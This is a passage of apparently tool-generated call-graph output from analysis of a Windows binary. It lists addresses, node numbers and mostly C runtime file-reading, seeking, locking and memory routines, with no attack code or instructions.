452966 87142->87143 87144 414d04 __fread_nolock 61 API calls 87143->87144 87145 452976 87144->87145 87146 414d04 __fread_nolock 61 API calls 87145->87146 87147 45298f 87146->87147 87148 414d04 __fread_nolock 61 API calls 87147->87148 87149 4529aa 87148->87149 87150 4150d1 _fseek 81 API calls 87149->87150 87151 4529c4 87150->87151 87152 4135bb _malloc 46 API calls 87151->87152 87153 4529cf 87152->87153 87154 4135bb _malloc 46 API calls 87153->87154 87155 4529db 87154->87155 87156 414d04 __fread_nolock 61 API calls 87155->87156 87157 4529ec 87156->87157 87158 44afef GetSystemTimeAsFileTime 87157->87158 87159 452a00 87158->87159 87160 452a36 87159->87160 87161 452a13 87159->87161 87163 452aa5 87160->87163 87164 452a3c 87160->87164 87162 413748 _free 46 API calls 87161->87162 87166 452a1c 87162->87166 87165 413748 _free 46 API calls 87163->87165 87726 44b1a9 87164->87726 87169 452aa3 87165->87169 87170 413748 _free 46 API calls 87166->87170 87168 452a9d 87171 413748 _free 46 API calls 87168->87171 87169->87057 87172 452a25 87170->87172 87171->87169 87172->87057 87174 431e64 87173->87174 87175 431e6a 87173->87175 87176 414a46 __fcloseall 82 API calls 87174->87176 87175->87058 87176->87175 87178 425de2 87177->87178 87179 40f6fc _wcslen 87177->87179 87178->87119 87180 40f710 WideCharToMultiByte 87179->87180 87181 40f756 87180->87181 87182 40f728 87180->87182 87181->87119 87183 4115d7 52 API calls 87182->87183 87184 40f735 WideCharToMultiByte 87183->87184 87184->87119 87187 40f85d _memcpy_s _strlen 87185->87187 87188 40f7ab 87187->87188 87233 414db8 87187->87233 87189 4149c2 87188->87189 87248 414904 87189->87248 87191 40f7e9 87191->87124 87192 40f5c0 87191->87192 87198 40f5cd _strcat __write_nolock _memmove 87192->87198 87193 414d04 __fread_nolock 61 API calls 87193->87198 87194 40f691 __tzset_nolock 87194->87126 87196 425d11 87197 4150d1 _fseek 81 API calls 87196->87197 87199 425d33 87197->87199 87198->87193 87198->87194 87198->87196 87336 4150d1 87198->87336 87200 414d04 __fread_nolock 61 API calls 87199->87200 87200->87194 87202 414a52 type_info::_Type_info_dtor 87201->87202 87203 414a64 87202->87203 87204 414a79 87202->87204 87476 417f77 46 API calls __getptd_noexit 87203->87476 87207 415471 __lock_file 47 API calls 87204->87207 87209 414a74 type_info::_Type_info_dtor 87204->87209 87206 414a69 87477 417f25 10 API calls __mbstowcs_s_l 87206->87477 87210 414a92 87207->87210 87209->87132 87460 4149d9 87210->87460 87545 414c76 87214->87545 87216 414d1c 87217 44afef 87216->87217 87713 442c5a 87217->87713 87219 44b00d 87219->87133 87221 414fee type_info::_Type_info_dtor 87220->87221 87222 414ffa 87221->87222 87223 41500f 87221->87223 87717 417f77 46 API calls __getptd_noexit 87222->87717 87224 415471 __lock_file 47 API calls 87223->87224 87226 415017 87224->87226 87228 414e4e __ftell_nolock 51 API calls 87226->87228 87227 414fff 87718 417f25 10 API calls __mbstowcs_s_l 87227->87718 87230 415024 87228->87230 87719 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87230->87719 87232 41500a type_info::_Type_info_dtor 87232->87135 87234 414dd6 87233->87234 87235 414deb 87233->87235 87244 417f77 46 API calls __getptd_noexit 87234->87244 87235->87234 87236 414df2 87235->87236 87246 41b91b 79 API calls 11 library calls 87236->87246 87239 414ddb 87245 417f25 10 API calls __mbstowcs_s_l 87239->87245 87241 414e18 87242 414de6 87241->87242 87247 418f98 77 API calls 6 library calls 87241->87247 87242->87187 87244->87239 87245->87242 87246->87241 87247->87242 87250 414910 type_info::_Type_info_dtor 87248->87250 87249 414923 87304 417f77 46 API calls __getptd_noexit 87249->87304 87250->87249 87252 414951 87250->87252 87267 41d4d1 87252->87267 87253 414928 87305 417f25 10 API calls __mbstowcs_s_l 87253->87305 87256 414956 87257 41496a 87256->87257 87258 41495d 87256->87258 87260 414992 87257->87260 87261 414972 87257->87261 87306 417f77 46 API calls __getptd_noexit 87258->87306 87284 41d218 87260->87284 87307 417f77 46 API calls __getptd_noexit 87261->87307 87262 414933 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 87262->87191 87268 41d4dd type_info::_Type_info_dtor 87267->87268 87269 4182cb __lock 46 API calls 87268->87269 87270 41d4eb 87269->87270 87271 41d567 87270->87271 87278 418209 __mtinitlocknum 46 API calls 87270->87278 87282 41d560 87270->87282 87312 4154b2 47 API calls __lock 87270->87312 87313 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87270->87313 87272 416b04 __malloc_crt 46 API calls 87271->87272 87274 41d56e 87272->87274 87275 41d57c InitializeCriticalSectionAndSpinCount 87274->87275 87274->87282 87276 41d59c 87275->87276 87277 41d5af EnterCriticalSection 87275->87277 87281 413748 _free 46 API calls 87276->87281 87277->87282 87278->87270 87280 41d5f0 type_info::_Type_info_dtor 87280->87256 87281->87282 87309 41d5fb 87282->87309 87285 41d23a 87284->87285 87286 41d255 87285->87286 87298 41d26c __wopenfile 87285->87298 87318 417f77 46 API calls __getptd_noexit 87286->87318 87288 41d421 87291 41d47a 87288->87291 87292 41d48c 87288->87292 87289 41d25a 87319 417f25 10 API calls __mbstowcs_s_l 87289->87319 87323 417f77 46 API calls __getptd_noexit 87291->87323 87315 422bf9 87292->87315 87295 41d47f 87324 417f25 10 API calls __mbstowcs_s_l 87295->87324 87296 41499d 87308 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87296->87308 87298->87288 87298->87291 87320 41341f 58 API calls 2 library calls 87298->87320 87300 41d41a 87300->87288 87321 41341f 58 API calls 2 library calls 87300->87321 87302 41d439 87302->87288 87322 41341f 58 API calls 2 library calls 87302->87322 87304->87253 87305->87262 87306->87262 87307->87262 87308->87262 87314 4181f2 LeaveCriticalSection 87309->87314 87311 41d602 87311->87280 87312->87270 87313->87270 87314->87311 87325 422b35 87315->87325 87317 422c14 87317->87296 87318->87289 87319->87296 87320->87300 87321->87302 87322->87288 87323->87295 87324->87296 87328 422b41 type_info::_Type_info_dtor 87325->87328 87326 422b54 87327 417f77 __mbstowcs_s_l 46 API calls 87326->87327 87330 422b59 87327->87330 87328->87326 87329 422b8a 87328->87329 87331 422400 __tsopen_nolock 109 API calls 87329->87331 87332 417f25 __mbstowcs_s_l 10 API calls 87330->87332 87333 422ba4 87331->87333 87335 422b63 type_info::_Type_info_dtor 87332->87335 87334 422bcb __wsopen_helper LeaveCriticalSection 87333->87334 87334->87335 87335->87317 87339 4150dd type_info::_Type_info_dtor 87336->87339 87337 4150e9 87367 417f77 46 API calls __getptd_noexit 87337->87367 87339->87337 87340 41510f 87339->87340 87349 415471 87340->87349 87342 4150ee 87368 417f25 10 API calls __mbstowcs_s_l 87342->87368 87348 4150f9 type_info::_Type_info_dtor 87348->87198 87350 415483 87349->87350 87351 4154a5 EnterCriticalSection 87349->87351 87350->87351 87352 41548b 87350->87352 87353 415117 87351->87353 87354 4182cb __lock 46 API calls 87352->87354 87355 415047 87353->87355 87354->87353 87356 415067 87355->87356 87357 415057 87355->87357 87362 415079 87356->87362 87370 414e4e 87356->87370 87425 417f77 46 API calls __getptd_noexit 87357->87425 87361 41505c 87369 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87361->87369 87387 41443c 87362->87387 87365 4150b9 87400 41e1f4 87365->87400 87367->87342 87368->87348 87369->87348 87371 414e61 87370->87371 87372 414e79 87370->87372 87426 417f77 46 API calls __getptd_noexit 87371->87426 87374 414139 __flush 46 API calls 87372->87374 87376 414e80 87374->87376 87375 414e66 87427 417f25 10 API calls __mbstowcs_s_l 87375->87427 87378 41e1f4 __write 51 API calls 87376->87378 87379 414e97 87378->87379 87380 414f09 87379->87380 87382 414ec9 87379->87382 87386 414e71 87379->87386 87428 417f77 46 API calls __getptd_noexit 87380->87428 87383 41e1f4 __write 51 API calls 87382->87383 87382->87386 87384 414f64 87383->87384 87385 41e1f4 __write 51 API calls 87384->87385 87384->87386 87385->87386 87386->87362 87388 414477 87387->87388 87389 414455 87387->87389 87393 414139 87388->87393 87389->87388 87390 414139 __flush 46 API calls 87389->87390 87391 414470 87390->87391 87429 41b7b2 77 API calls 5 library calls 87391->87429 87394 414145 87393->87394 87395 41415a 87393->87395 87430 417f77 46 API calls __getptd_noexit 87394->87430 87395->87365 87397 41414a 87431 417f25 10 API calls __mbstowcs_s_l 87397->87431 87399 414155 87399->87365 87401 41e200 type_info::_Type_info_dtor 87400->87401 87402 41e223 87401->87402 87403 41e208 87401->87403 87404 41e22f 87402->87404 87409 41e269 87402->87409 87452 417f8a 46 API calls __getptd_noexit 87403->87452 87454 417f8a 46 API calls __getptd_noexit 87404->87454 87407 41e20d 87453 417f77 46 API calls __getptd_noexit 87407->87453 87408 41e234 87455 417f77 46 API calls __getptd_noexit 87408->87455 87432 41ae56 87409->87432 87413 41e23c 87456 417f25 10 API calls __mbstowcs_s_l 87413->87456 87414 41e26f 87416 41e291 87414->87416 87417 41e27d 87414->87417 87457 417f77 46 API calls __getptd_noexit 87416->87457 87442 41e17f 87417->87442 87419 41e215 type_info::_Type_info_dtor 87419->87361 87421 41e289 87459 41e2c0 LeaveCriticalSection __unlock_fhandle 87421->87459 87422 41e296 87458 417f8a 46 API calls __getptd_noexit 87422->87458 87425->87361 87426->87375 87427->87386 87428->87386 87429->87388 87430->87397 87431->87399 87433 41ae62 type_info::_Type_info_dtor 87432->87433 87434 41aebc 87433->87434 87437 4182cb __lock 46 API calls 87433->87437 87435 41aec1 EnterCriticalSection 87434->87435 87436 41aede type_info::_Type_info_dtor 87434->87436 87435->87436 87436->87414 87438 41ae8e 87437->87438 87439 41aeaa 87438->87439 87440 41ae97 InitializeCriticalSectionAndSpinCount 87438->87440 87441 41aeec ___lock_fhandle LeaveCriticalSection 87439->87441 87440->87439 87441->87434 87443 41aded __close_nolock 46 API calls 87442->87443 87444 41e18e 87443->87444 87445 41e1a4 SetFilePointer 87444->87445 87446 41e194 87444->87446 87447 41e1bb GetLastError 87445->87447 87449 41e1c3 87445->87449 87448 417f77 __mbstowcs_s_l 46 API calls 87446->87448 87447->87449 87450 41e199 87448->87450 87449->87450 87451 417f9d __dosmaperr 46 API calls 87449->87451 87450->87421 87451->87450 87452->87407 87453->87419 87454->87408 87455->87413 87456->87419 87457->87422 87458->87421 87459->87419 87461 4149ea 87460->87461 87462 4149fe 87460->87462 87506 417f77 46 API calls __getptd_noexit 87461->87506 87464 4149fa 87462->87464 87466 41443c __flush 77 API calls 87462->87466 87478 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87464->87478 87465 4149ef 87507 417f25 10 API calls __mbstowcs_s_l 87465->87507 87468 414a0a 87466->87468 87479 41d8c2 87468->87479 87471 414139 __flush 46 API calls 87472 414a18 87471->87472 87483 41d7fe 87472->87483 87474 414a1e 87474->87464 87475 413748 _free 46 API calls 87474->87475 87475->87464 87476->87206 87477->87209 87478->87209 87480 41d8d2 87479->87480 87482 414a12 87479->87482 87481 413748 _free 46 API calls 87480->87481 87480->87482 87481->87482 87482->87471 87484 41d80a type_info::_Type_info_dtor 87483->87484 87485 41d812 87484->87485 87487 41d82d 87484->87487 87523 417f8a 46 API calls __getptd_noexit 87485->87523 87488 41d839 87487->87488 87491 41d873 87487->87491 87525 417f8a 46 API calls __getptd_noexit 87488->87525 87489 41d817 87524 417f77 46 API calls __getptd_noexit 87489->87524 87494 41ae56 ___lock_fhandle 48 API calls 87491->87494 87493 41d83e 87526 417f77 46 API calls __getptd_noexit 87493->87526 87496 41d879 87494->87496 87499 41d893 87496->87499 87500 41d887 87496->87500 87497 41d846 87527 417f25 10 API calls __mbstowcs_s_l 87497->87527 87528 417f77 46 API calls __getptd_noexit 87499->87528 87508 41d762 87500->87508 87501 41d81f type_info::_Type_info_dtor 87501->87474 87504 41d88d 87529 41d8ba LeaveCriticalSection __unlock_fhandle 87504->87529 87506->87465 87507->87464 87530 41aded 87508->87530 87510 41d7c8 87543 41ad67 47 API calls 2 library calls 87510->87543 87512 41d772 87512->87510 87513 41d7a6 87512->87513 87515 41aded __close_nolock 46 API calls 87512->87515 87513->87510 87516 41aded __close_nolock 46 API calls 87513->87516 87514 41d7d0 87517 41d7f2 87514->87517 87544 417f9d 46 API calls 3 library calls 87514->87544 87518 41d79d 87515->87518 87519 41d7b2 CloseHandle 87516->87519 87517->87504 87521 41aded __close_nolock 46 API calls 87518->87521 87519->87510 87522 41d7be GetLastError 87519->87522 87521->87513 87522->87510 87523->87489 87524->87501 87525->87493 87526->87497 87527->87501 87528->87504 87529->87501 87531 41adfa 87530->87531 87533 41ae12 87530->87533 87532 417f8a __write 46 API calls 87531->87532 87534 41adff 87532->87534 87535 417f8a __write 46 API calls 87533->87535 87536 41ae51 87533->87536 87537 417f77 __mbstowcs_s_l 46 API calls 87534->87537 87538 41ae23 87535->87538 87536->87512 87539 41ae07 87537->87539 87540 417f77 __mbstowcs_s_l 46 API calls 87538->87540 87539->87512 87541 41ae2b 87540->87541 87542 417f25 __mbstowcs_s_l 10 API calls 87541->87542 87542->87539 87543->87514 87544->87517 87546 414c82 type_info::_Type_info_dtor 87545->87546 87547 414cc3 87546->87547 87548 414c96 _memcpy_s 87546->87548 87557 414cbb type_info::_Type_info_dtor 87546->87557 87549 415471 __lock_file 47 API calls 87547->87549 87572 417f77 46 API calls __getptd_noexit 87548->87572 87550 414ccb 87549->87550 87558 414aba 87550->87558 87553 414cb0 87573 417f25 10 API calls __mbstowcs_s_l 87553->87573 87557->87216 87559 414ad8 _memcpy_s 87558->87559 87565 414af2 87558->87565 87560 414ae2 87559->87560 87559->87565 87569 414b2d 87559->87569 87625 417f77 46 API calls __getptd_noexit 87560->87625 87562 414ae7 87626 417f25 10 API calls __mbstowcs_s_l 87562->87626 87574 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87565->87574 87566 414c38 _memcpy_s 87628 417f77 46 API calls __getptd_noexit 87566->87628 87567 414139 __flush 46 API calls 87567->87569 87569->87565 87569->87566 87569->87567 87575 41dfcc 87569->87575 87605 41d8f3 87569->87605 87627 41e0c2 46 API calls 3 library calls 87569->87627 87572->87553 87573->87557 87574->87557 87576 41dfd8 type_info::_Type_info_dtor 87575->87576 87577 41dfe0 87576->87577 87578 41dffb 87576->87578 87698 417f8a 46 API calls __getptd_noexit 87577->87698 87579 41e007 87578->87579 87584 41e041 87578->87584 87700 417f8a 46 API calls __getptd_noexit 87579->87700 87582 41dfe5 87699 417f77 46 API calls __getptd_noexit 87582->87699 87583 41e00c 87701 417f77 46 API calls __getptd_noexit 87583->87701 87587 41e063 87584->87587 87588 41e04e 87584->87588 87589 41ae56 ___lock_fhandle 48 API calls 87587->87589 87703 417f8a 46 API calls __getptd_noexit 87588->87703 87593 41e069 87589->87593 87590 41e014 87702 417f25 10 API calls __mbstowcs_s_l 87590->87702 87592 41e053 87704 417f77 46 API calls __getptd_noexit 87592->87704 87596 41e077 87593->87596 87597 41e08b 87593->87597 87595 41dfed type_info::_Type_info_dtor 87595->87569 87629 41da15 87596->87629 87705 417f77 46 API calls __getptd_noexit 87597->87705 87601 41e083 87707 41e0ba LeaveCriticalSection __unlock_fhandle 87601->87707 87602 41e090 87706 417f8a 46 API calls __getptd_noexit 87602->87706 87606 41d900 87605->87606 87609 41d915 87605->87609 87711 417f77 46 API calls __getptd_noexit 87606->87711 87608 41d905 87712 417f25 10 API calls __mbstowcs_s_l 87608->87712 87611 41d94a 87609->87611 87616 41d910 87609->87616 87708 420603 87609->87708 87613 414139 __flush 46 API calls 87611->87613 87614 41d95e 87613->87614 87615 41dfcc __read 59 API calls 87614->87615 87617 41d965 87615->87617 87616->87569 87617->87616 87618 414139 __flush 46 API calls 87617->87618 87619 41d988 87618->87619 87619->87616 87620 414139 __flush 46 API calls 87619->87620 87621 41d994 87620->87621 87621->87616 87622 414139 __flush 46 API calls 87621->87622 87623 41d9a1 87622->87623 87624 414139 __flush 46 API calls 87623->87624 87624->87616 87625->87562 87626->87565 87627->87569 87628->87562 87630 41da31 87629->87630 87631 41da4c 87629->87631 87632 417f8a __write 46 API calls 87630->87632 87633 41da5b 87631->87633 87635 41da7a 87631->87635 87634 41da36 87632->87634 87636 417f8a __write 46 API calls 87633->87636 87638 417f77 __mbstowcs_s_l 46 API calls 87634->87638 87637 41da98 87635->87637 87652 41daac 87635->87652 87639 41da60 87636->87639 87640 417f8a __write 46 API calls 87637->87640 87649 41da3e 87638->87649 87642 417f77 __mbstowcs_s_l 46 API calls 87639->87642 87644 41da9d 87640->87644 87641 41db02 87643 417f8a __write 46 API calls 87641->87643 87645 41da67 87642->87645 87647 41db07 87643->87647 87648 417f77 __mbstowcs_s_l 46 API calls 87644->87648 87646 417f25 __mbstowcs_s_l 10 API calls 87645->87646 87646->87649 87650 417f77 __mbstowcs_s_l 46 API calls 87647->87650 87651 41daa4 87648->87651 87649->87601 87650->87651 87655 417f25 __mbstowcs_s_l 10 API calls 87651->87655 87652->87641 87652->87649 87653 41dae1 87652->87653 87654 41db1b 87652->87654 87653->87641 87656 41daec ReadFile 87653->87656 87658 416b04 __malloc_crt 46 API calls 87654->87658 87655->87649 87659 41dc17 87656->87659 87660 41df8f GetLastError 87656->87660 87661 41db31 87658->87661 87659->87660 87667 41dc2b 87659->87667 87662 41de16 87660->87662 87663 41df9c 87660->87663 87664 41db59 87661->87664 87665 41db3b 87661->87665 87671 417f9d __dosmaperr 46 API calls 87662->87671 87677 41dd9b 87662->87677 87669 417f77 __mbstowcs_s_l 46 API calls 87663->87669 87668 420494 __lseeki64_nolock 48 API calls 87664->87668 87666 417f77 __mbstowcs_s_l 46 API calls 87665->87666 87670 41db40 87666->87670 87667->87677 87683 41dc47 87667->87683 87684 41de5b 87667->87684 87672 41db67 87668->87672 87673 41dfa1 87669->87673 87675 417f8a __write 46 API calls 87670->87675 87671->87677 87672->87656 87674 417f8a __write 46 API calls 87673->87674 87674->87677 87675->87649 87676 413748 _free 46 API calls 87676->87649 87677->87649 87677->87676 87678 41dcab ReadFile 87680 41dcc9 GetLastError 87678->87680 87690 41dcd3 87678->87690 87679 41ded0 ReadFile 87681 41deef GetLastError 87679->87681 87691 41def9 87679->87691 87680->87683 87680->87690 87681->87684 87681->87691 87682 41ddec MultiByteToWideChar 87682->87677 87685 41de10 GetLastError 87682->87685 87683->87678 87688 41dd28 87683->87688 87684->87677 87684->87679 87685->87662 87686 41dda3 87693 41dd60 87686->87693 87694 41ddda 87686->87694 87687 41dd96 87689 417f77 __mbstowcs_s_l 46 API calls 87687->87689 87688->87677 87688->87686 87688->87687 87688->87693 87689->87677 87690->87683 87695 420494 __lseeki64_nolock 48 API calls 87690->87695 87691->87684 87692 420494 __lseeki64_nolock 48 API calls 87691->87692 87692->87691 87693->87682 87696 420494 __lseeki64_nolock 48 API calls 87694->87696 87695->87690 87697 41dde9 87696->87697 87697->87682 87698->87582 87699->87595 87700->87583 87701->87590 87702->87595 87703->87592 87704->87590 87705->87602 87706->87601 87707->87595 87709 416b04 __malloc_crt 46 API calls 87708->87709 87710 420618 87709->87710 87710->87611 87711->87608 87712->87616 87716 4148b3 GetSystemTimeAsFileTime __aulldiv 87713->87716 87715 442c6b 87715->87219 87716->87715 87717->87227 87718->87232 87719->87232 87721 45272f __tzset_nolock _wcscpy 87720->87721 87722 414d04 61 API calls __fread_nolock 87721->87722 87723 44afef GetSystemTimeAsFileTime 87721->87723 87724 4528a4 87721->87724 87725 4150d1 81 API calls _fseek 87721->87725 87722->87721 87723->87721 87724->87141 87724->87142 87725->87721 87727 44b1bc 87726->87727 87728 44b1ca 87726->87728 87729 4149c2 116 API calls 87727->87729 87730 44b1e1 87728->87730 87731 4149c2 116 API calls 87728->87731 87732 44b1d8 87728->87732 87729->87728 87761 4321a4 87730->87761 87733 44b2db 87731->87733 87732->87168 87733->87730 87735 44b2e9 87733->87735 87737 44b2f6 87735->87737 87740 414a46 __fcloseall 82 API calls 87735->87740 87736 44b224 87738 44b253 87736->87738 87739 44b228 87736->87739 87737->87168 87765 43213d 87738->87765 87742 44b235 87739->87742 87745 414a46 __fcloseall 82 API calls 87739->87745 87740->87737 87743 44b245 87742->87743 87746 414a46 __fcloseall 82 API calls 87742->87746 87743->87168 87744 44b25a 87747 44b289 87744->87747 87749 44b260 87744->87749 87745->87742 87746->87743 87775 44b0bf 87 API calls 87747->87775 87750 44b26d 87749->87750 87752 414a46 __fcloseall 82 API calls 87749->87752 87753 44b27d 87750->87753 87755 414a46 __fcloseall 82 API calls 87750->87755 87751 44b28f 87776 4320f8 46 API calls _free 87751->87776 87752->87750 87753->87168 87755->87753 87756 44b295 87757 44b2a2 87756->87757 87758 414a46 __fcloseall 82 API calls 87756->87758 87759 44b2b2 87757->87759 87760 414a46 __fcloseall 82 API calls 87757->87760 87758->87757 87759->87168 87760->87759 87762 4321cb 87761->87762 87764 4321b4 __tzset_nolock _memmove 87761->87764 87763 414d04 __fread_nolock 61 API calls 87762->87763 87763->87764 87764->87736 87766 4135bb _malloc 46 API calls 87765->87766 87767 432150 87766->87767 87768 4135bb _malloc 46 API calls 87767->87768 87769 432162 87768->87769 87770 4135bb _malloc 46 API calls 87769->87770 87771 432174 87770->87771 87773 432189 87771->87773 87777 4320f8 46 API calls _free 87771->87777 87773->87744 87774 432198 87774->87744 87775->87751 87776->87756 87777->87774 87778->87071 87779->87072 87780->87091 87781->87091 87782->87091 87783->87086 87784->87091 87785->87091 87786->87096 87787->87106 87788->87105 87789->87105 87839 410160 87790->87839 87792 41012f GetFullPathNameW 87793 410147 ctype 87792->87793 87793->86927 87795 4102cb SHGetDesktopFolder 87794->87795 87796 410333 _wcsncpy 87794->87796 87795->87796 87797 4102e0 _wcsncpy 87795->87797 87796->86930 87797->87796 87798 41031c SHGetPathFromIDListW 87797->87798 87798->87796 87800 4101bb 87799->87800 87802 425f4a 87799->87802 87801 410160 52 API calls 87800->87801 87803 4101c7 87801->87803 87804 4114ab __wcsicoll 58 API calls 87802->87804 87807 425f6e 87802->87807 87843 410200 52 API calls 2 library calls 87803->87843 87804->87802 87806 4101d6 87844 410200 52 API calls 2 library calls 87806->87844 87807->86932 87809 4101e9 87809->86932 87811 40f760 128 API calls 87810->87811 87812 40f584 87811->87812 87813 429335 87812->87813 87814 40f58c 87812->87814 87815 4528bd 118 API calls 87813->87815 87816 40f598 87814->87816 87817 429358 87814->87817 87818 42934b 87815->87818 87869 4033c0 113 API calls 7 library calls 87816->87869 87870 434034 86 API calls _wprintf 87817->87870 87821 429373 87818->87821 87822 42934f 87818->87822 87826 4115d7 52 API calls 87821->87826 87825 431e58 82 API calls 87822->87825 87823 429369 87823->87821 87824 40f5b4 87824->86928 87825->87817 87831 4293c5 ctype 87826->87831 87827 42959c 87828 413748 _free 46 API calls 87827->87828 87829 4295a5 87828->87829 87830 431e58 82 API calls 87829->87830 87832 4295b1 87830->87832 87831->87827 87836 401b10 52 API calls 87831->87836 87845 444af8 87831->87845 87848 44b41c 87831->87848 87855 402780 87831->87855 87863 4022d0 87831->87863 87871 44c7dd 64 API calls 3 library calls 87831->87871 87836->87831 87840 410167 _wcslen 87839->87840 87841 4115d7 52 API calls 87840->87841 87842 41017e _wcscpy 87841->87842 87842->87792 87843->87806 87844->87809 87846 4115d7 52 API calls 87845->87846 87847 444b27 _memmove 87846->87847 87847->87831 87849 44b429 87848->87849 87850 4115d7 52 API calls 87849->87850 87851 44b440 87850->87851 87852 44b45e 87851->87852 87853 401b10 52 API calls 87851->87853 87852->87831 87854 44b453 87853->87854 87854->87831 87857 402827 87855->87857 87861 402790 ctype _memmove 87855->87861 87856 4115d7 52 API calls 87859 402797 87856->87859 87858 4115d7 52 API calls 87857->87858 87858->87861 87860 4115d7 52 API calls 87859->87860 87862 4027bd 87859->87862 87860->87862 87861->87856 87862->87831 87864 4022e0 87863->87864 87867 40239d 87863->87867 87865 4115d7 52 API calls 87864->87865 87866 402320 ctype 87864->87866 87864->87867 87865->87866 87866->87867 87868 4115d7 52 API calls 87866->87868 87867->87831 87868->87866 87869->87824 87870->87823 87871->87831 87873 402539 ctype 87872->87873 87874 402417 87872->87874 87873->86936 87874->87873 87875 4115d7 52 API calls 87874->87875 87876 402443 87875->87876 87877 4115d7 52 API calls 87876->87877 87878 4024b4 87877->87878 87878->87873 87880 4022d0 52 API calls 87878->87880 87901 402880 95 API calls 2 library calls 87878->87901 87880->87878 87885 401566 87881->87885 87882 401794 87902 40e9a0 90 API calls 87882->87902 87885->87882 87886 4010a0 52 API calls 87885->87886 87887 40167a 87885->87887 87886->87885 87888 4017c0 87887->87888 87903 45e737 90 API calls 3 library calls 87887->87903 87888->86938 87890 40bc70 52 API calls 87889->87890 87899 40d451 87890->87899 87891 40d50f 87906 410600 52 API calls 87891->87906 87893 427c01 87907 45e737 90 API calls 3 library calls 87893->87907 87894 40e0a0 52 API calls 87894->87899 87896 40d519 87896->86941 87897 401b10 52 API calls 87897->87899 87899->87891 87899->87893 87899->87894 87899->87896 87899->87897 87904 40f310 53 API calls 87899->87904 87905 40d860 91 API calls 87899->87905 87901->87878 87902->87887 87903->87888 87904->87899 87905->87899 87906->87896 87907->87896 87908->86954 87909->86955 87911 4091c6 87910->87911 87912 42c5fe 87910->87912 87911->87013 87912->87911 87913 40bc70 52 API calls 87912->87913 87914 42c64e InterlockedIncrement 87913->87914 87915 42c665 87914->87915 87920 42c697 87914->87920 87917 42c672 InterlockedDecrement Sleep InterlockedIncrement 87915->87917 87915->87920 87916 42c737 InterlockedDecrement 87918 42c74a 87916->87918 87917->87915 87917->87920 87921 408f40 VariantClear 87918->87921 87919 42c731 87919->87916 87920->87916 87920->87919 88203 408e80 87920->88203 87923 42c752 87921->87923 88212 410c60 VariantClear ctype 87923->88212 87927 42c6db 87928 402160 52 API calls 87927->87928 87929 42c6e5 87928->87929 88208 45340c 85 API calls 87929->88208 87931 42c6f1 88209 40d200 52 API calls 2 library calls 87931->88209 87933 42c6fb 88210 465124 53 API calls 87933->88210 87935 42c715 87936 42c76a 87935->87936 87937 42c719 87935->87937 87939 401b10 52 API calls 87936->87939 88211 46fe32 VariantClear 87937->88211 87940 42c77e 87939->87940 87941 401980 53 API calls 87940->87941 87946 42c796 87941->87946 87942 42c812 88214 46fe32 VariantClear 87942->88214 87944 42c82a InterlockedDecrement 88215 46ff07 54 API calls 87944->88215 87946->87942 87947 42c864 87946->87947 88213 40ba10 52 API calls 2 library calls 87946->88213 88216 45e737 90 API calls 3 library calls 87947->88216 87949 42c9ec 88259 47d33e 329 API calls 87949->88259 87952 42c9fe 88260 46feb1 VariantClear VariantClear 87952->88260 87954 42c874 87957 408f40 VariantClear 87954->87957 87967 42ca59 87954->87967 87955 408f40 VariantClear 87964 42c849 87955->87964 87956 42ca08 87958 401b10 52 API calls 87956->87958 87959 42c891 87957->87959 87960 42ca15 87958->87960 88217 410c60 VariantClear ctype 87959->88217 87961 40c2c0 52 API calls 87960->87961 87961->87954 87963 401980 53 API calls 87963->87964 87964->87949 87964->87955 87964->87963 87965 402780 52 API calls 87964->87965 88218 40a780 87964->88218 87965->87964 87967->87967 87969 40afc4 87968->87969 87970 40b156 87968->87970 87971 40afd5 87969->87971 87972 42d1e3 87969->87972 88270 45e737 90 API calls 3 library calls 87970->88270 87975 40a780 192 API calls 87971->87975 87993 40b11a ctype 87971->87993 88271 45e737 90 API calls 3 library calls 87972->88271 87977 40b00a 87975->87977 87976 42d1f8 87980 408f40 VariantClear 87976->87980 87977->87976 87982 40b012 87977->87982 87979 42d4db 87979->87979 87981 40b143 87980->87981 87981->87013 87983 40b04a 87982->87983 87984 40b094 ctype 87982->87984 87985 42d231 VariantClear 87982->87985 87990 40b05c ctype 87983->87990 88272 40e270 VariantClear ctype 87983->88272 87986 40b108 87984->87986 87988 42d425 ctype 87984->87988 87985->87990 87986->87993 88273 40e270 VariantClear ctype 87986->88273 87987 42d45a VariantClear 87987->87993 87988->87987 87988->87993 87990->87984 87992 4115d7 52 API calls 87990->87992 87992->87984 87993->87981 88274 45e737 90 API calls 3 library calls 87993->88274 87995 408fff 87994->87995 87997 40900d 87994->87997 88275 403ea0 52 API calls __cinit 87995->88275 87999 42c3f6 87997->87999 88001 40a780 192 API calls 87997->88001 88002 42c44a 87997->88002 88004 42c47b 87997->88004 88006 42c4cb 87997->88006 88007 42c564 87997->88007 88010 42c548 87997->88010 88014 409112 87997->88014 88016 4090df 87997->88016 88018 42c528 87997->88018 88022 4090ea 87997->88022 88028 4090f2 ctype 87997->88028 88277 4534e3 52 API calls 87997->88277 88279 40c4e0 192 API calls 87997->88279 88278 45e737 90 API calls 3 library calls 87999->88278 88001->87997 88280 45e737 90 API calls 3 library calls 88002->88280 88281 451b42 61 API calls 88004->88281 88283 47faae 231 API calls 88006->88283 88011 408f40 VariantClear 88007->88011 88286 45e737 90 API calls 3 library calls 88010->88286 88011->88028 88012 42c491 88012->88028 88282 45e737 90 API calls 3 library calls 88012->88282 88013 42c4da 88013->88028 88284 45e737 90 API calls 3 library calls 88013->88284 88014->88010 88020 40912b 88014->88020 88016->88022 88023 408e80 VariantClear 88016->88023 88285 45e737 90 API calls 3 library calls 88018->88285 88020->88028 88276 403e10 53 API calls 88020->88276 88024 408f40 VariantClear 88022->88024 88023->88022 88024->88028 88026 40914b 88027 408f40 VariantClear 88026->88027 88027->88028 88028->87013 88287 408d90 88029->88287 88031 429778 88314 410c60 VariantClear ctype 88031->88314 88033 429780 88034 408cf9 88034->88031 88035 42976c 88034->88035 88037 408d2d 88034->88037 88313 45e737 90 API calls 3 library calls 88035->88313 88303 403d10 88037->88303 88040 408d71 ctype 88040->87013 88041 408f40 VariantClear 88042 408d45 ctype 88041->88042 88042->88040 88042->88041 88044 425c87 88043->88044 88045 40d15f 88043->88045 88046 425cc7 88044->88046 88047 425ca1 